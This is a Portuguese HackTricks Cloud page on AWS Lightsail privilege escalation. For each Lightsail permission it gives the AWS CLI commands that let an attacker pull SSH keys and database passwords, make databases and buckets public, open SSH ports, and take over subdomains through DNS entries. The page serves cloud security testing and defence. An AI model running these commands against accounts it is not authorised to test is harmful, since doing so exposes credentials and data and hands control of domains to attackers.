AWS - Lightsail Privesc

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Verifique os PLANOS DE ASSINATURA!
Adquira o swag oficial PEASS & HackTricks
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.

Lightsail

Para mais informações sobre Lightsail, verifique:

É importante observar que o Lightsail não usa funções IAM pertencentes ao usuário mas a uma conta gerenciada pela AWS, então você não pode abusar desse serviço para escalonamento de privilégios. No entanto, dados sensíveis como código, chaves de API e informações de banco de dados podem ser encontrados neste serviço.

`lightsail:DownloadDefaultKeyPair`

Essa permissão permitirá que você obtenha as chaves SSH para acessar as instâncias:

aws lightsail download-default-key-pair

Impacto Potencial: Encontrar informações sensíveis dentro das instâncias.

`lightsail:GetInstanceAccessDetails`

Essa permissão permitirá que você gere chaves SSH para acessar as instâncias:

aws lightsail get-instance-access-details --instance-name <instance_name>

Impacto Potencial: Encontrar informações sensíveis dentro das instâncias.

`lightsail:CreateBucketAccessKey`

Essa permissão permitirá que você obtenha uma chave para acessar o bucket:

aws lightsail create-bucket-access-key --bucket-name <name>

Impacto Potencial: Encontrar informações sensíveis dentro do bucket.

`lightsail:GetRelationalDatabaseMasterUserPassword`

Essa permissão permitirá que você obtenha as credenciais para acessar o banco de dados:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Impacto Potencial: Encontrar informações sensíveis dentro do banco de dados.

`lightsail:UpdateRelationalDatabase`

Essa permissão permitirá que você altere a senha para acessar o banco de dados:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Se o banco de dados não for público, você também pode torná-lo público com essas permissões com

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Impacto Potencial: Encontrar informações sensíveis dentro do banco de dados.

`lightsail:OpenInstancePublicPorts`

Essa permissão permite abrir portas para a Internet.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Impacto Potencial: Acesso a portas sensíveis.

`lightsail:PutInstancePublicPorts`

Esta permissão permite abrir portas para a Internet. Note que a chamada fechará qualquer porta aberta que não esteja especificada nela.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Impacto Potencial: Acesso a portas sensíveis.

`lightsail:SetResourceAccessForBucket`

Essas permissões permitem dar a instâncias acesso a um bucket sem a necessidade de credenciais extras

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Impacto Potencial: Novo acesso potencial a buckets com informações sensíveis.

`lightsail:UpdateBucket`

Com essa permissão, um atacante poderia conceder ao seu próprio conta da AWS acesso de leitura sobre buckets ou até mesmo tornar os buckets públicos para todos:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Impacto Potencial: Novo acesso potencial a buckets com informações sensíveis.

`lightsail:UpdateContainerService`

Com essas permissões, um atacante poderia conceder acesso a ECRs privados a partir do serviço de contêineres.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Impacto Potencial: Obter informações sensíveis do ECR privado

`lightsail:CreateDomainEntry`

Um atacante com essa permissão poderia criar um subdomínio e apontá-lo para seu próprio endereço IP (apropriação de subdomínio), ou criar um registro SPF que permita a ele falsificar e-mails do domínio, ou até mesmo definir o endereço IP principal do domínio como o seu próprio.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Impacto Potencial: Tomada de controle de um domínio

`lightsail:UpdateDomainEntry`

Um atacante com essa permissão poderia criar um subdomínio e apontá-lo para seu próprio endereço IP (tomada de controle de subdomínio), ou criar um registro SPF que permita a ele falsificar e-mails do domínio, ou até mesmo definir o endereço IP do próprio domínio para o dele.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Impacto Potencial: Assumir o controle de um domínio

Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Verifique os PLANOS DE ASSINATURA!
Adquira o swag oficial PEASS & HackTricks
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.

AnteriorAWS - Lambda Privesc SiguienteAWS - Mediapackage Privesc

Última actualización hace 3 meses